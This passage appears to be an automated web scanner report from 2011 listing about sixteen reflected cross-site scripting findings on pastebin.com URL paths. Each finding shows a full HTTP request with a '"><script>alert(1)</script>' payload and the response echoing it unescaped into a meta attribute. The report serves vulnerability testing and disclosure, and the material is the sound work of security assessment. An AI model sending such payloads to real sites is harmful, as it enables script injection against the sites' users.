This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /etc/adsca1b0"><script>alert(1)</script>e6b4ca5c2bf/iframes/160x600.html HTTP/1.1
Host: pastebin.com
Proxy-Connection: keep-alive
Referer: http://pastebin.com/bq8xJPMn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookie_key=1

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.4
Date: Tue, 06 Sep 2011 18:10:38 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.6
Set-Cookie: cookie_key=19; expires=Tue, 04-Oct-2011 18:10:38 GMT; path=/; domain=.pastebin.com
Vary: Accept-Encoding
Content-Length: 10613

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/etc/adsca1b0\"><script>alert(1)</script>e6b4ca5c2bf/iframes/160x600.html"/>
...[SNIP]...

1.9. http://pastebin.com/etc/ads/iframes/160x600.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pastebin.com
Path:   /etc/ads/iframes/160x600.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88792"><script>alert(1)</script>442cfd43152 was submitted in the REST URL parameter 3. This input was echoed as 88792\"><script>alert(1)</script>442cfd43152 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /etc/ads/iframes88792"><script>alert(1)</script>442cfd43152/160x600.html HTTP/1.1
Host: pastebin.com
Proxy-Connection: keep-alive
Referer: http://pastebin.com/bq8xJPMn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookie_key=1

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.4
Date: Tue, 06 Sep 2011 18:10:39 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.6
Set-Cookie: cookie_key=21; expires=Tue, 04-Oct-2011 18:10:39 GMT; path=/; domain=.pastebin.com
Vary: Accept-Encoding
Content-Length: 10594

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/etc/ads/iframes88792\"><script>alert(1)</script>442cfd43152/160x600.html"/>
...[SNIP]...

1.10. http://pastebin.com/etc/ads/iframes/160x600.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pastebin.com
Path:   /etc/ads/iframes/160x600.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5448e"><script>alert(1)</script>4efdc9546fc was submitted in the REST URL parameter 4. This input was echoed as 5448e\"><script>alert(1)</script>4efdc9546fc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /etc/ads/iframes/160x600.html5448e"><script>alert(1)</script>4efdc9546fc HTTP/1.1
Host: pastebin.com
Proxy-Connection: keep-alive
Referer: http://pastebin.com/bq8xJPMn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookie_key=1

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.4
Date: Tue, 06 Sep 2011 18:10:39 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.6
Set-Cookie: cookie_key=23; expires=Tue, 04-Oct-2011 18:10:39 GMT; path=/; domain=.pastebin.com
Vary: Accept-Encoding
Content-Length: 10594

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/etc/ads/iframes/160x600.html5448e\"><script>alert(1)</script>4efdc9546fc"/>
...[SNIP]...

1.11. http://pastebin.com/etc/ads/iframes/728x90.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pastebin.com
Path:   /etc/ads/iframes/728x90.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab2ff"><script>alert(1)</script>c79d6fd4ca4 was submitted in the REST URL parameter 1. This input was echoed as ab2ff\"><script>alert(1)</script>c79d6fd4ca4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /etcab2ff"><script>alert(1)</script>c79d6fd4ca4/ads/iframes/728x90.html HTTP/1.1
Host: pastebin.com
Proxy-Connection: keep-alive
Referer: http://pastebin.com/bq8xJPMn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookie_key=1

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.4
Date: Tue, 06 Sep 2011 18:10:38 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.6
Set-Cookie: cookie_key=17; expires=Tue, 04-Oct-2011 18:10:38 GMT; path=/; domain=.pastebin.com
Vary: Accept-Encoding
Content-Length: 10611

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/etcab2ff\"><script>alert(1)</script>c79d6fd4ca4/ads/iframes/728x90.html"/>
...[SNIP]...

1.12. http://pastebin.com/etc/ads/iframes/728x90.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pastebin.com
Path:   /etc/ads/iframes/728x90.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eeee0"><script>alert(1)</script>1adcfa6439a was submitted in the REST URL parameter 2. This input was echoed as eeee0\"><script>alert(1)</script>1adcfa6439a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /etc/adseeee0"><script>alert(1)</script>1adcfa6439a/iframes/728x90.html HTTP/1.1
Host: pastebin.com
Proxy-Connection: keep-alive
Referer: http://pastebin.com/bq8xJPMn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookie_key=1

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.4
Date: Tue, 06 Sep 2011 18:10:38 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.6
Set-Cookie: cookie_key=19; expires=Tue, 04-Oct-2011 18:10:38 GMT; path=/; domain=.pastebin.com
Vary: Accept-Encoding
Content-Length: 10592

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/etc/adseeee0\"><script>alert(1)</script>1adcfa6439a/iframes/728x90.html"/>
...[SNIP]...

1.13. http://pastebin.com/etc/ads/iframes/728x90.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pastebin.com
Path:   /etc/ads/iframes/728x90.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c601a"><script>alert(1)</script>f7bf1eddb58 was submitted in the REST URL parameter 3. This input was echoed as c601a\"><script>alert(1)</script>f7bf1eddb58 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /etc/ads/iframesc601a"><script>alert(1)</script>f7bf1eddb58/728x90.html HTTP/1.1
Host: pastebin.com
Proxy-Connection: keep-alive
Referer: http://pastebin.com/bq8xJPMn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookie_key=1

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.4
Date: Tue, 06 Sep 2011 18:10:39 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.6
Set-Cookie: cookie_key=21; expires=Tue, 04-Oct-2011 18:10:39 GMT; path=/; domain=.pastebin.com
Vary: Accept-Encoding
Content-Length: 10592

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/etc/ads/iframesc601a\"><script>alert(1)</script>f7bf1eddb58/728x90.html"/>
...[SNIP]...

1.14. http://pastebin.com/etc/ads/iframes/728x90.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pastebin.com
Path:   /etc/ads/iframes/728x90.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1424"><script>alert(1)</script>aa0b6363e32 was submitted in the REST URL parameter 4. This input was echoed as a1424\"><script>alert(1)</script>aa0b6363e32 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /etc/ads/iframes/728x90.htmla1424"><script>alert(1)</script>aa0b6363e32 HTTP/1.1
Host: pastebin.com
Proxy-Connection: keep-alive
Referer: http://pastebin.com/bq8xJPMn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookie_key=1

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.4
Date: Tue, 06 Sep 2011 18:10:40 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.6
Set-Cookie: cookie_key=24; expires=Tue, 04-Oct-2011 18:10:40 GMT; path=/; domain=.pastebin.com
Vary: Accept-Encoding
Content-Length: 10592

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/etc/ads/iframes/728x90.htmla1424\"><script>alert(1)</script>aa0b6363e32"/>
...[SNIP]...

1.15. http://pastebin.com/etc/social/index.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pastebin.com
Path:   /etc/social/index.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b6c5"><script>alert(1)</script>0582bb56850 was submitted in the REST URL parameter 1. This input was echoed as 9b6c5\"><script>alert(1)</script>0582bb56850 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /etc9b6c5"><script>alert(1)</script>0582bb56850/social/index.html HTTP/1.1
Host: pastebin.com
Proxy-Connection: keep-alive
Referer: http://pastebin.com/bq8xJPMn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookie_key=1

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.4
Date: Tue, 06 Sep 2011 18:10:38 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.6
Set-Cookie: cookie_key=15; expires=Tue, 04-Oct-2011 18:10:38 GMT; path=/; domain=.pastebin.com
Vary: Accept-Encoding
Content-Length: 10599

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/etc9b6c5\"><script>alert(1)</script>0582bb56850/social/index.html"/>
...[SNIP]...

1.16. http://pastebin.com/etc/social/index.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pastebin.com
Path:   /etc/social/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f4fe"><script>alert(1)</script>732c7f33cfd was submitted in the REST URL parameter 2. This input was echoed as 7f4fe\"><script>alert(1)</script>732c7f33cfd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /etc/social7f4fe"><script>alert(1)</script>732c7f33cfd/index.html HTTP/1.1
Host: pastebin.com
Proxy-Connection: keep-alive
Referer: http://pastebin.com/bq8xJPMn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookie_key=1

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.4
Date: Tue, 06 Sep 2011 18:10:38 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.6
Set-Cookie: cookie_key=17; expires=Tue, 04-Oct-2011 18:10:38 GMT; path=/; domain=.pastebin.com
Vary: Accept-Encoding
Content-Length: 10599

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/etc/social7f4fe\"><script>alert(1)</script>732c7f33cfd/index.html"/>
...[SNIP]...

1.17. http://pastebin.com/etc/social/index.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pastebin.com
Path:   /etc/social/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload faf56"><script>alert(1)</script>0f8d2babee7 was submitted in the REST URL parameter 3. This input was echoed as faf56\"><script>alert(1)</script>0f8d2babee7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /etc/social/index.htmlfaf56"><script>alert(1)</script>0f8d2babee7 HTTP/1.1
Host: pastebin.com
Proxy-Connection: keep-alive
Referer: http://pastebin.com/bq8xJPMn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookie_key=1

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.4
Date: Tue, 06 Sep 2011 18:10:39 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.6
Set-Cookie: cookie_key=19; expires=Tue, 04-Oct-2011 18:10:39 GMT; path=/; domain=.pastebin.com
Vary: Accept-Encoding
Content-Length: 10580

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/etc/social/index.htmlfaf56\"><script>alert(1)</script>0f8d2babee7"/>
...[SNIP]...

1.18. http://pastebin.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pastebin.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc7dc"><script>alert(1)</script>bda8880cef7 was submitted in the REST URL parameter 1. This input was echoed as cc7dc\"><script>alert(1)</script>bda8880cef7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icocc7dc"><script>alert(1)</script>bda8880cef7 HTTP/1.1
Host: pastebin.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookie_key=1; __utma=47852966.871251161.1315350535.1315350535.1315350535.1; __utmb=47852966.1.10.1315350535; __utmc=47852966; __utmz=47852966.1315350535.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=gttp%3A%2F%2Fwww.rankmyhack.com%2Fincludes%2Findexheader.php; __qca=P0-143015204-1315350538245

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.4
Date: Tue, 06 Sep 2011 18:11:06 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.6
Set-Cookie: cookie_key=13; expires=Tue, 04-Oct-2011 18:11:06 GMT; path=/; domain=.pastebin.com
Vary: Accept-Encoding
Content-Length: 10589

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/favicon.icocc7dc\"><script>alert(1)</script>bda8880cef7"/>
...[SNIP]...

1.19. http://pastebin.com/i/fixed.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pastebin.com
Path:   /i/fixed.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3ddd"><script>alert(1)</script>cf73614236c was submitted in the REST URL parameter 1. This input was echoed as d3ddd\"><script>alert(1)</script>cf73614236c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /id3ddd"><script>alert(1)</script>cf73614236c/fixed.css?1 HTTP/1.1
Host: pastebin.com
Proxy-Connection: keep-alive
Referer: http://pastebin.com/bq8xJPMn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookie_key=1

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.4
Date: Tue, 06 Sep 2011 18:10:38 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.6
Set-Cookie: cookie_key=17; expires=Tue, 04-Oct-2011 18:10:38 GMT; path=/; domain=.pastebin.com
Vary: Accept-Encoding
Content-Length: 10583

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/id3ddd\"><script>alert(1)</script>cf73614236c/fixed.css?1"/>
...[SNIP]...

1.20. http://pastebin.com/i/fixed.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pastebin.com
Path:   /i/fixed.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4864d"><script>alert(1)</script>7c325f7bd4e was submitted in the REST URL parameter 2. This input was echoed as 4864d\"><script>alert(1)</script>7c325f7bd4e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /i/fixed.css4864d"><script>alert(1)</script>7c325f7bd4e?1 HTTP/1.1
Host: pastebin.com
Proxy-Connection: keep-alive
Referer: http://pastebin.com/bq8xJPMn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookie_key=1

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.4
Date: Tue, 06 Sep 2011 18:10:38 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.6
Set-Cookie: cookie_key=19; expires=Tue, 04-Oct-2011 18:10:38 GMT; path=/; domain=.pastebin.com
Vary: Accept-Encoding
Content-Length: 10564

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/i/fixed.css4864d\"><script>alert(1)</script>7c325f7bd4e?1"/>
...[SNIP]...

1.21. http://pastebin.com/i/style.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pastebin.com
Path:   /i/style.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99db1"><script>alert(1)</script>5c32890a4a was submitted in the REST URL parameter 1. This input was echoed as 99db1\"><script>alert(1)</script>5c32890a4a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /i99db1"><script>alert(1)</script>5c32890a4a/style.css?12 HTTP/1.1
Host: pastebin.com
Proxy-Connection: keep-alive
Referer: http://pastebin.com/bq8xJPMn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookie_key=1

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.4
Date: Tue, 06 Sep 2011 18:10:38 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.6
Set-Cookie: cookie_key=16; expires=Tue, 04-Oct-2011 18:10:38 GMT; path=/; domain=.pastebin.com
Vary: Accept-Encoding
Content-Length: 10583

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/i99db1\"><script>alert(1)</script>5c32890a4a/style.css?12"/>
...[SNIP]...

1.22. http://pastebin.com/i/style.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pastebin.com
Path:   /i/style.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed4cc"><script>alert(1)</script>b321a1af605 was submitted in the REST URL parameter 2. This input was echoed as ed4cc\"><script>alert(1)</script>b321a1af605 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /i/style.cssed4cc"><script>alert(1)</script>b321a1af605?12 HTTP/1.1
Host: pastebin.com
Proxy-Connection: keep-alive
Referer: http://pastebin.com/bq8xJPMn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookie_key=1

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.4
Date: Tue, 06 Sep 2011 18:10:38 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.6
Set-Cookie: cookie_key=18; expires=Tue, 04-Oct-2011 18:10:38 GMT; path=/; domain=.pastebin.com
Vary: Accept-Encoding
Content-Length: 10585

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/i/style.cssed4cc\"><script>alert(1)</script>b321a1af605?12"/>
...[SNIP]...

1.23. http://pastebin.com/js/ZeroClipboard.swf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pastebin.com
Path:   /js/ZeroClipboard.swf

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25ae8"><script>alert(1)</script>cd11aa5c8e0 was submitted in the REST URL parameter 1. This input was echoed as 25ae8\"><script>alert(1)</script>cd11aa5c8e0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js25ae8"><script>alert(1)</script>cd11aa5c8e0/ZeroClipboard.swf HTTP/1.1
Host: pastebin.com
Proxy-Connection: keep-alive
Referer: http://pastebin.com/bq8xJPMn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookie_key=1

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.4
Date: Tue, 06 Sep 2011 18:10:49 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.6
Set-Cookie: cookie_key=7; expires=Tue, 04-Oct-2011 18:10:49 GMT; path=/; domain=.pastebin.com
Vary: Accept-Encoding
Content-Length: 10562

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/js25ae8\"><script>alert(1)</script>cd11aa5c8e0/ZeroClipboard.swf"/>
...[SNIP]...

1.24. http://pastebin.com/js/ZeroClipboard.swf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pastebin.com
